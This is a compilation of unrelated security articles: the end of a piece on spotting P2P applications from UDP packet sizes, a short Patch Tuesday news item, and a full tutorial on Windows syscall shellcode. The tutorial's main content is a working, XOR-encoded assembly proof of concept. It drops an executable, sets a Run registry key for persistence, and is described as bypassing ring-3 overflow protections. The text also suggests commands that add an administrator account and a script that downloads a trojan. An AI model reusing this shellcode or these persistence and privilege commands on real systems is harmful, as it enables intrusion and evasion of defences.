This sounds like a good method of P2P host identification, but what about false positives? Fortunately, this kind of network traffic behavior is seldom seen in other types of usage around the Internet. An exception would be a host that is a traditional game server, DNS server or media server. This kind of server will also produce traffic records in which many UDP packets are sent out to many different IP addresses from a single source. But administrators can easily distinguish whether a host is a traditional server, because a server normally will not send any kind of traffic on ports other than its functional port, which is not the model used by a P2P host.

The value of this UDP connection pattern is obvious: this approach does not need any kind of application layer information, yet the result is still quite satisfactory. It does not rely on any kind of signatures, so newly developed P2P applications can still be identified quickly in large networks. Meanwhile, analyzing network layer information requires almost no extra software or hardware, and dramatically reduces the pressure that might otherwise be put on the corresponding equipment.

Disadvantages of this approach

To be sure, this UDP session method also has two disadvantages. First, it can only be used to identify P2P applications that use a decentralized structure (although most modern P2P applications are indeed decentralized). Second, if a P2P application chooses TCP rather than UDP to perform its control functions, our identification work will fail.
Identifying P2P applications
Up to this point we have identified P2P users by relying on network connection records. We now go one step further, to identify exactly what P2P application a host is running without the help of any higher-layer data.

Examining the UDP traffic of different P2P applications more carefully, you will find even more interesting patterns. It has been mentioned that a decentralized network structure needs control-purpose packets, and it is not difficult to understand that for a given P2P application there are many kinds of control packets. Packets with the same control purpose are very often identical in size. Therefore, UDP packet sizes can even help us identify exactly which P2P application is running, in the absence of any higher level information.

Most P2P applications do not have complete documentation of their implementation details, and some of them are closed source, so we are still unclear about the exact makeup of most applications' UDP packets. Therefore, the author of this article has randomly selected seven popular, decentralized P2P applications and made such observations. The results confirm the hypothesis that all these applications use some fixed-length packets to contact the outside.

* Edonkey2000
Edonkey2000 uses many 6 byte UDP packets to send out 'server status requests'. These kinds of packets are mostly seen when Edonkey launches. Additionally, the packet performing the search function is almost always seen, and has a length of 25 bytes.

* BearShare
When BearShare launches, it first sends out UDP packets with a length of 28 bytes to many different destinations. Every time BearShare launches a file transfer task, there will be a lot of UDP packets, each with a length of 23 bytes, sent out to file suppliers.

* Limewire
Limewire sends out many 35 byte and 23 byte UDP packets when it starts. Every time a download task starts, there will be many 23 byte UDP packets communicating with the outside.

* Skype
Skype starts up with many 18 byte UDP packets to communicate with the outside.

* Kazaa
When Kazaa launches, it sends out UDP packets with a length of 12 bytes to many different destinations.

* EMule
When you start EMule and select a server to connect to, there will continuously be many 6 byte UDP packets sent out to perform 'server status request' and 'get server info'. If you choose to connect to the Kad network in EMule, there will continuously be 27 byte and 35 byte UDP packets appearing in the connection traffic.

* Shareaza
During Shareaza's lifetime, you will continuously discover 19 byte UDP packets in the traffic.

The results of these simple tests are quite interesting. They mean that after identifying the peers in the network records, we could use this technique to determine exactly what application a peer is using. However, research on the sizes of different P2P applications' control packets is still in its infancy and there are many things left to do. For a detailed and accurate result, each application may need special focus, and a lot of research work is still needed.
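As a rough sketch of how these observations might be applied (the length table merely transcribes the author's test figures above, which are observations rather than authoritative protocol constants), one could vote over the packet sizes seen from an already-identified peer:

from collections import Counter

# Control packet lengths (bytes) observed per application, from the tests above.
SIZE_HINTS = {
    6:  ["Edonkey2000", "EMule"],
    25: ["Edonkey2000"],
    28: ["BearShare"],
    23: ["BearShare", "Limewire"],
    35: ["Limewire", "EMule (Kad)"],
    27: ["EMule (Kad)"],
    18: ["Skype"],
    12: ["Kazaa"],
    19: ["Shareaza"],
}

def guess_application(udp_lengths):
    votes = Counter()
    for length in udp_lengths:
        for app in SIZE_HINTS.get(length, []):
            votes[app] += 1
    return votes.most_common(3)

# Lengths taken from a suspected peer's outgoing UDP control packets:
print(guess_application([6, 6, 6, 25, 25, 6]))  # Edonkey2000 leads

Because several applications share sizes (6 bytes, 23 bytes), a confident answer needs multiple corroborating sizes per host rather than a single match.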

Furthermore, there are other means that can be combined with the methods discussed in this article to better identify P2P users and P2P applications. Some P2P applications will make connections to fixed outside IP addresses to perform such functions as version checks, authentication, downloading bootstrap data, or even advertising. For example, Kazaa will connect to ssa.Kazaa.com, desktop.Kazaa.com and some other sites when it operates. Skype will make a TCP connection to ui.skype.com whenever it starts up.

There are also other aspects of traffic behavior, such as the amount of data transferred. Connection duration may be used in P2P identification as well, but this adds another level of complexity.
Conclusion
As always, there is no one-size-fits-all solution for P2P identification. Although port based analysis and protocol analysis are currently the most important and commonly used technologies, we should not feel content with them. With a little brainstorming, another method may crop up to reinforce the P2P identification toolbox.

Acknowledgement

My special thanks to Kelly Martin for his careful review and suggestions!

Six patches for MS August Patch Tuesday

In brief Microsoft plans to release six patches next Tuesday, 9 August. All of the patches involve Microsoft Windows and at least one is critical, according to minimalist details from an advance bulletin notification from Redmond issued Thursday. ®

Windows Syscall Shellcode

Introduction
This article has been written to show that it is possible to write shellcode for Windows operating systems that doesn't use standard API calls at all. Of course, as with every solution, this approach has both advantages and disadvantages. In this paper we will look at such shellcode and also introduce some example usage. IA-32 assembly knowledge is definitely required to fully understand this article.

All shellcode here has been tested on Windows XP SP1. Note that there are variations in the approach depending on the operating system and service pack level, so this will be discussed further as we progress.
Some background

Windows NT-based systems (NT/2000/XP/2003 and beyond) were designed to handle many subsystems, each having its own individual environment. For example, one of the NT subsystems is Win32 (for normal Windows applications); other examples would be POSIX (Unix) or OS/2. What does this mean? It means that Windows NT could actually run OS/2 applications (of course, with the proper OS add-ons) and support most of their features. So how was this achieved? To support all of these potential subsystems, Microsoft made a unified set of APIs, with each subsystem providing wrappers around them. In short, all subsystems have all the libraries needed for them to work. For example, Win32 apps call the Win32 subsystem APIs, which in turn call NT APIs (native APIs, or just natives). Natives don't require any subsystem to run.

From native API calls to syscalls
Is this theory true -- can shellcode be written without any standard API calls? Well, for some APIs it is; for some it isn't. There are many APIs that do their job without calling native NT APIs at all. To prove this, let's look at the GetCommandLineA API exported from KERNEL32.DLL.

.text:77E7E358 ; --------------- S U B R O U T I N E -------------------------
.text:77E7E358
.text:77E7E358
.text:77E7E358 ; LPSTR GetCommandLineA(void)
.text:77E7E358 public GetCommandLineA
.text:77E7E358 GetCommandLineA proc near
.text:77E7E358 mov eax, dword_77ED7614
.text:77E7E35D retn
.text:77E7E35D GetCommandLineA endp

This API routine doesn't make any calls at all. The only thing it does is return the pointer to the program command line. But let's now look at an example that is in line with our theory. What follows is part of the TerminateProcess API's disassembly.

.text:77E616B8 ; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
.text:77E616B8 public TerminateProcess
.text:77E616B8 TerminateProcess proc near ; CODE XREF: ExitProcess+12 j
.text:77E616B8 ; sub_77EC3509+DA p
.text:77E616B8
.text:77E616B8 hProcess = dword ptr 4
.text:77E616B8 uExitCode = dword ptr 8
.text:77E616B8
.text:77E616B8 cmp [esp+hProcess], 0
.text:77E616BD jz short loc_77E616D7
.text:77E616BF push [esp+uExitCode] ; 1st param: Exit code
.text:77E616C3 push [esp+4+hProcess] ; 2nd param: Handle of process
.text:77E616C7 call ds:NtTerminateProcess ; NTDLL!NtTerminateProcess

As you can see, the TerminateProcess API passes its arguments along and then executes NtTerminateProcess, exported by NTDLL.DLL. NTDLL.DLL implements the native API. In other words, a function whose name starts with 'Nt' is a native API (some of them also have 'Zw' aliases -- just look at what the NTDLL library exports). Let's now look at NtTerminateProcess.

.text:77F5C448 public ZwTerminateProcess
.text:77F5C448 ZwTerminateProcess proc near ; CODE XREF: sub_77F68F09+D1 p
.text:77F5C448 ; RtlAssert2+B6 p
.text:77F5C448 mov eax, 101h ; syscall number: NtTerminateProcess
.text:77F5C44D mov edx, 7FFE0300h ; EDX = 7FFE0300h
.text:77F5C452 call edx ; call 7FFE0300h
.text:77F5C454 retn 8
.text:77F5C454 ZwTerminateProcess endp

This native API in fact only puts the number of the syscall into EAX and calls the memory at 7FFE0300h, which contains:

7FFE0300 8BD4 MOV EDX,ESP
7FFE0302 0F34 SYSENTER
7FFE0304 C3 RETN

And that shows how the story goes: EDX now holds the user stack pointer, and EAX holds the number of the system call to execute. The SYSENTER instruction executes a fast call to a ring 0 system routine, which does the rest of the job.
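As an aside, this layering can be poked at from user mode without writing any assembly. The following Windows-only Python ctypes fragment (an illustration of the NTDLL layer, not of the shellcode technique itself) skips the KERNEL32 wrapper and calls the native export directly:

import ctypes

ntdll = ctypes.WinDLL("ntdll")

# HANDLE -1 is the pseudo-handle for the current process, just as with
# TerminateProcess(GetCurrentProcess(), ...).
CURRENT_PROCESS = ctypes.c_void_p(-1)

# Same native that KERNEL32!TerminateProcess reaches via ds:NtTerminateProcess.
ntdll.NtTerminateProcess(CURRENT_PROCESS, 0)  # terminates this process

Note that this still executes NTDLL's stub, which loads EAX and issues SYSENTER as shown above; the shellcode in this article goes one layer deeper and issues SYSENTER itself.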
Operating system differences

In Windows 2000 (and other NT-based systems before XP), no SYSENTER instruction is used; Windows XP replaced the old "int 2Eh" mechanism with the SYSENTER instruction. The following schema shows the syscall implementation for Windows 2000:

MOV EAX, SyscallNumber ; requested syscall number
LEA EDX, [ESP+4] ; EDX = params...
INT 2Eh ; throw the execution to the KM handler
RET 4*NUMBER_OF_PARAMS ; return

We already know the Windows XP way; however, here is the variant I'm using in shellcode:

push fn ; push syscall number
pop eax ; EAX = syscall number
push eax ; this one makes no diff
call b ; put caller address on stack
b: add [esp],(offset r - offset b) ; normalize stack
mov edx, esp ; EDX = stack
db 0fh, 34h ; SYSENTER instruction
r: add esp, (param*4) ; normalize stack

It seems that SYSENTER was first introduced in the Intel Pentium II processors. This author is not certain, but one can guess that SYSENTER is not supported by Athlon processors. To determine whether the instruction is available on a particular processor, use the CPUID instruction together with a check of the SEP flag and some specific family/model/stepping checks. Here is an example of how Intel does this type of checking:

IF (CPUID SEP bit is set)
THEN IF (Family = 6) AND (Model < 3) AND (Stepping < 3)
THEN
SYSENTER/SYSEXIT_NOT_SUPPORTED
FI;
ELSE SYSENTER/SYSEXIT_SUPPORTED
FI;

But of course this is not the only difference among the various Windows operating systems -- system call numbers also change between Windows versions, as the following table shows:
Syscall symbol             NtAddAtom  NtAdjustPrivilegesToken  NtAlertThread
Windows NT           SP 3  0x3        0x5                      0x7
                     SP 4  0x3        0x5                      0x7
                     SP 5  0x3        0x5                      0x7
                     SP 6  0x3        0x5                      0x7
Windows 2000         SP 0  0x8        0xa                      0xc
                     SP 1  0x8        0xa                      0xc
                     SP 2  0x8        0xa                      0xc
                     SP 3  0x8        0xa                      0xc
                     SP 4  0x8        0xa                      0xc
Windows XP           SP 0  0x8        0xb                      0xd
                     SP 1  0x8        0xb                      0xd
                     SP 2  0x8        0xb                      0xd
Windows 2003 Server  SP 0  0x8        0xc                      0xe
                     SP 1  0x8        0xc                      0xe

Tables of syscall numbers are available on the Internet. The reader is advised to look at the one from metasploit.com; however, other sources may also be good.
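To illustrate the compatibility burden, here is a minimal Python sketch (a hypothetical structure, with the numbers taken from the table above) of the kind of per-version lookup that a syscall-based payload or tool has to carry:

# Per-version syscall numbers, transcribed from the table above.
SYSCALL_TABLES = {
    "Windows NT":          {"NtAddAtom": 0x3, "NtAdjustPrivilegesToken": 0x5, "NtAlertThread": 0x7},
    "Windows 2000":        {"NtAddAtom": 0x8, "NtAdjustPrivilegesToken": 0xA, "NtAlertThread": 0xC},
    "Windows XP":          {"NtAddAtom": 0x8, "NtAdjustPrivilegesToken": 0xB, "NtAlertThread": 0xD},
    "Windows 2003 Server": {"NtAddAtom": 0x8, "NtAdjustPrivilegesToken": 0xC, "NtAlertThread": 0xE},
}

def syscall_number(version, name):
    return SYSCALL_TABLES[version][name]

print(hex(syscall_number("Windows XP", "NtAlertThread")))  # 0xd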

Syscall shellcode advantages
There are several advantages when using this approach:

* Shellcode doesn't require the use of APIs, and thus doesn't have to locate API addresses (there is no kernel address finding, no export section parsing, no import section parsing, and so on). Due to this "feature" it is able to bypass most ring 3 "buffer overflow prevention systems." Such protection mechanisms usually don't stop the buffer overflow attack itself; instead, they mainly hook the most used APIs and check the caller address. Here, such checking would be of no use.
* Since you are sending requests directly to the kernel handler and "jumping over" all of those instructions from the Win32 subsystem, the speed of execution increases greatly (although in the era of modern processors, who truly cares about the speed of shellcode?).

Syscall shellcode disadvantages
There are also several disadvantages to this approach:

* Size -- this is the main disadvantage. Because we are "jumping over" all of those subsystem wrappers, we need to code our own, and this increases the size of the shellcode.
* Compatibility -- as has been written above, various implementations exist, from "int 2Eh" to SYSENTER, depending on the operating system version. Also, the system call numbers change with each Windows version (for more, see the Further reading section).

The ideas
The shellcode at the end of this article drops a file and then writes a registry key. This causes execution of the dropped file after the computer reboots. Many of you may ask why we would not execute the file directly, without touching the registry. Well, executing a Win32 application via syscalls is not a simple task -- don't think that NtCreateProcess alone will do the job. Let's look at what the CreateProcess API must do to execute an application:

1. Open the image file (.exe) to be executed inside the process.
2. Create the Windows executive process object.
3. Create the initial thread (stack, context, and Windows executive thread object).
4. Notify the Win32 subsystem of the new process so that it can set up for the new process and thread.
5. Start execution of the initial thread (unless the CREATE_SUSPENDED flag was specified).
6. In the context of the new process and thread, complete the initialization of the address space (such as load required DLLs) and begin execution of the program.

Therefore, it is clearly much easier and quicker to use the registry method. The shellcode that concludes this article drops a sample MessageBox application (mainly a PE structure, which is big in itself, so the size increases); however, there are plenty of other solutions. An attacker can drop a script file (batch/vbs/other) that downloads a trojan/backdoor file from an ftp server, or just execute various commands such as: "net user /add piotr test123" & "net localgroup /add administrators piotr". This idea should help the reader with optimizations; now enjoy the proof of concept shellcode.
The shellcode - Proof Of Concept

comment $
-----------------------------------------------
WinNT (XP) Syscall Shellcode - Proof Of Concept
-----------------------------------------------
Written by: Piotr Bania
http://pb.specialised.info
$
include my_macro.inc
include io.inc
; --- CONFIGURE HERE -----------------------------------------------------------------
; If you want to change something here, you need to update size entries written above.
FILE_PATH equ "\??\C:\b.exe",0 ; dropper
SHELLCODE_DROP equ "D:\asm\shellcodeXXX.dat" ; where to drop
; shellcode
REG_PATH equ "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run",0
; ------------------------------------------------------------------------------------
KEY_ALL_ACCESS equ 0000f003fh ; const value
_S_NtCreateFile equ 000000025h ; syscall numbers for
_S_NtWriteFile equ 000000112h ; Windows XP SP1
_S_NtClose equ 000000019h
_S_NtCreateSection equ 000000032h
_S_NtCreateKey equ 000000029h
_S_NtSetValueKey equ 0000000f7h
_S_NtTerminateThread equ 000000102h
_S_NtTerminateProcess equ 000000101h
@syscall macro fn, param ; syscall implementation
local b, r ; for Windows XP
push fn
pop eax
push eax ; makes no diff
call b
b: add [esp],(offset r - offset b)
mov edx, esp
db 0fh, 34h
r: add esp, (param*4)
endm
path struc ; some useful structs
p_path dw MAX_PATH dup (?) ; converted from C headers
path ends
object_attributes struc
oa_length dd ?
oa_rootdir dd ?
oa_objectname dd ?
oa_attribz dd ?
oa_secdesc dd ?
oa_secqos dd ?
object_attributes ends
pio_status_block struc
psb_ntstatus dd ?
psb_info dd ?
pio_status_block ends
unicode_string struc
us_length dw ?
dw ?
us_pstring dd ?
unicode_string ends
call crypt_and_dump_sh ; xor and dump shellcode
sc_start proc
local u_string :unicode_string ; local variables
local fpath :path ; (stack based)
local rpath :path
local obj_a :object_attributes
local iob :pio_status_block
local fHandle :DWORD
local rHandle :DWORD
sub ebp,500 ; allocate space on stack
push FILE_PATH_ULEN ; set up unicode string
pop [u_string.us_length] ; length
push 255 ; set up unicode max string
pop [u_string.us_length+2] ; length
lea edi,[fpath] ; EDI = ptr to unicode file
push edi ; path
pop [u_string.us_pstring] ; set up the unicode entry
call a_p1 ; put file path address
a_s: db FILE_PATH ; on stack
FILE_PATH_LEN equ $ - offset a_s
FILE_PATH_ULEN equ 18h
a_p1: pop esi ; ESI = ptr to file path
push FILE_PATH_LEN ; (ascii one)
pop ecx ; ECX = FILE_PATH_LEN
xor eax,eax ; EAX = 0
a_lo: lodsb ; begin ascii to unicode
stosw ; conversion do not forget
loop a_lo ; to do sample align
lea edi,[obj_a] ; EDI = object attributes st.
lea ebx,[u_string] ; EBX = unicode string st.
push 18h ; sizeof(object attribs)
pop [edi.oa_length] ; store
push ebx ; store the object name
pop [edi.oa_objectname]
push eax ; rootdir = NULL
pop [edi.oa_rootdir]
push eax ; secdesc = NULL
pop [edi.oa_secdesc]
push eax ; secqos = NULL
pop [edi.oa_secqos]
push 40h ; attributes value = 40h
pop [edi.oa_attribz]
lea ecx,[iob] ; ECX = io status block
push eax ; ealength = null
push eax ; eabuffer = null
push 60h ; create options
push 05h ; create disposition
push eax ; share access = NULL
push 80h ; file attributes
push eax ; allocation size = NULL
push ecx ; io status block
push edi ; object attributes
push 0C0100080h ; desired access
lea esi,[fHandle]
push esi ; (out) file handle
@syscall _S_NtCreateFile, 11 ; execute syscall
lea ecx,[iob] ; ecx = io status block
push eax ; key = null
push eax ; byte offset = null
push main_exploit_s ; length of data
call a3 ; ptr to dropper body
s1: include msgbin.inc ; dropper data
main_exploit_s equ $ - offset s1
a3: push ecx ; io status block
push eax ; apc context = null
push eax ; apc routine = null
push eax ; event = null
push dword ptr [esi] ; file handle
@syscall _S_NtWriteFile, 9 ; execute the syscall
mov edx,edi ; edx = object attributes
lea edi,[rpath] ; edi = registry path
push edi ; store the pointer
pop [u_string.us_pstring] ; into unicode struct
push REG_PATH_ULEN ; store new path len
pop [u_string.us_length]
call a_p2 ; store the ascii reg path
a_s1: db REG_PATH ; pointer on stack
REG_PATH_LEN equ $ - offset a_s1
REG_PATH_ULEN equ 7eh
a_p2: pop esi ; esi ptr to ascii reg path
push REG_PATH_LEN
pop ecx ; ECX = REG_PATH_LEN
a_lo1: lodsb ; little ascii 2 unicode
stosw ; conversion
loop a_lo1
push eax ; disposition = null
push eax ; create options = null
push eax ; class = null
push eax ; title index = null
push edx ; object attributes struct
push KEY_ALL_ACCESS ; desired access
lea esi,[rHandle]
push esi ; (out) handle
@syscall _S_NtCreateKey,6
lea ebx,[fpath] ; EBX = file path
lea ecx,[fHandle] ; ECX = file handle
push eax
pop [ecx] ; nullify file handle
push FILE_PATH_ULEN - 8 ; push the unicode len
; without 8 (no '\??\')
push ebx ; file path
add [esp],8 ; without '\??'
push REG_SZ ; type
push eax ; title index = NULL
push ecx ; value name = NULL = default
push dword ptr [esi] ; key handle
@syscall _S_NtSetValueKey,6 ; set they key value
dec eax
push eax ; exit status code
push eax ; process handle
; -1 current process
@syscall _S_NtTerminateProcess,2 ; maybe you want
; TerminateThread instead?
ssc_size equ $ -offset sc_start
sc_start endp
exit:
push 0
@callx ExitProcess
crypt_and_dump_sh: ; this gonna' xor
; the shellcode and
mov edi,(offset sc_start - 1) ; add the decryptor
mov ecx,ssc_size ; finally shellcode file
; will be dumped
xor_loop:
inc edi
xor byte ptr [edi],96h
loop xor_loop
_fcreat SHELLCODE_DROP,ebx ; some of my old crazy
_fwrite ebx,sh_decryptor,sh_dec_size ; io macros
_fwrite ebx,sc_start,ssc_size
_fclose ebx
jmp exit
sh_decryptor: ; that's how the decryptor
xor ecx,ecx ; looks like
mov cx,ssc_size
fldz
sh_add: fnstenv [esp-12] ; fnstenv decoder
pop edi
add edi,sh_dec_add
sh_dec_loop:
inc edi
xor byte ptr [edi],96h
loop sh_dec_loop
sh_dec_add equ ($ - offset sh_add) + 1
sh_dec_size equ $ - offset sh_decryptor
end start

Final words
The author hopes you have enjoyed the article. If you have any comments, don't hesitate to contact him; also remember that the code was developed for educational purposes only.
Further reading

1. "Inside the Native API" by Mark Russinovich
2. "MSDN" from Microsoft
3. Interactive Win32 syscall page from Metasploit